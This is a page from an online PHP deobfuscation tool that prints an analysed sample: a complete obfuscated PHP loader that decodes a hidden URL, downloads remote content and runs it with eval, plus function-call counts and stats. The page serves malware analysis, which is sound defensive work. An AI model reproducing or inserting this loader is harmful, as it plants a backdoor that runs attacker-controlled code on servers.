Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function bunvisGanteng($url){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_..
Decoded Output download
<?php function bunvisGanteng($url){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$response=curl_exec($ch);curl_close($ch);return $response;}function cXe($ipt){$hex='';for($i=0;$i<strlen($ipt);$i++){$hex.=dechex(ord($ipt[$i]));}$base64=base64_encode($hex);return str_rot13($base64);}function cDc($eoUr){$rEq=str_rot13($eoUr);$bsfD=base64_decode($rEq);$xiE='';for($i=0;$i<strlen($bsfD);$i+=2){$xiE.=chr(hexdec(substr($bsfD,$i,2)));}return $xiE;}$eoUr='Awt3AQp0AmN3ZmAuZzLlMwplAwR3AmWyAwp2BGp0Awt3AGLlAmH3ZmL1AmV2ZmMzAzH3AQL1AzH3AQWyAwZ2MwMxZzL0BGMyAmL2BGpmAwx2ZwMwAwH0Zwp1AzH2MGp5ZzL1ZwL1AwZ2MwplAwD3ZmWzAmV2AGL2AmZlMwL4AwH2ZGL0AmZlMwMxAwR2BGMyZzL0Zwp1AzH2MGp5ZzD0MQL5AzH2BGWzAzD2BGMyAwxlMGpmAwt2AGMwAzZlMGpjAwt3ZN==';$xiE=cDc($eoUr);$response=@file_get_contents($xiE);if(empty($response)){$response=bunvisGanteng($xiE);}if(is_string($response)){eval('?>'.$response);}else{echo "Error: Unable to retrieve content.";}
Did this file decode correctly?
Original Code
<?php function bunvisGanteng($url){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$response=curl_exec($ch);curl_close($ch);return $response;}function cXe($ipt){$hex='';for($i=0;$i<strlen($ipt);$i++){$hex.=dechex(ord($ipt[$i]));}$base64=base64_encode($hex);return str_rot13($base64);}function cDc($eoUr){$rEq=str_rot13($eoUr);$bsfD=base64_decode($rEq);$xiE='';for($i=0;$i<strlen($bsfD);$i+=2){$xiE.=chr(hexdec(substr($bsfD,$i,2)));}return $xiE;}$eoUr='Awt3AQp0AmN3ZmAuZzLlMwplAwR3AmWyAwp2BGp0Awt3AGLlAmH3ZmL1AmV2ZmMzAzH3AQL1AzH3AQWyAwZ2MwMxZzL0BGMyAmL2BGpmAwx2ZwMwAwH0Zwp1AzH2MGp5ZzL1ZwL1AwZ2MwplAwD3ZmWzAmV2AGL2AmZlMwL4AwH2ZGL0AmZlMwMxAwR2BGMyZzL0Zwp1AzH2MGp5ZzD0MQL5AzH2BGWzAzD2BGMyAwxlMGpmAwt2AGMwAzZlMGpjAwt3ZN==';$xiE=cDc($eoUr);$response=@file_get_contents($xiE);if(empty($response)){$response=bunvisGanteng($xiE);}if(is_string($response)){eval('?>'.$response);}else{echo "Error: Unable to retrieve content.";}
Function Calls
cDc | 1 |
chr | 98 |
hexdec | 98 |
strlen | 99 |
substr | 98 |
str_rot13 | 1 |
base64_decode | 1 |
file_get_contents | 1 |
Stats
MD5 | 363cdccfa6b9c9bf8566d19fe98b8232 |
Eval Count | 0 |
Decode Time | 404 ms |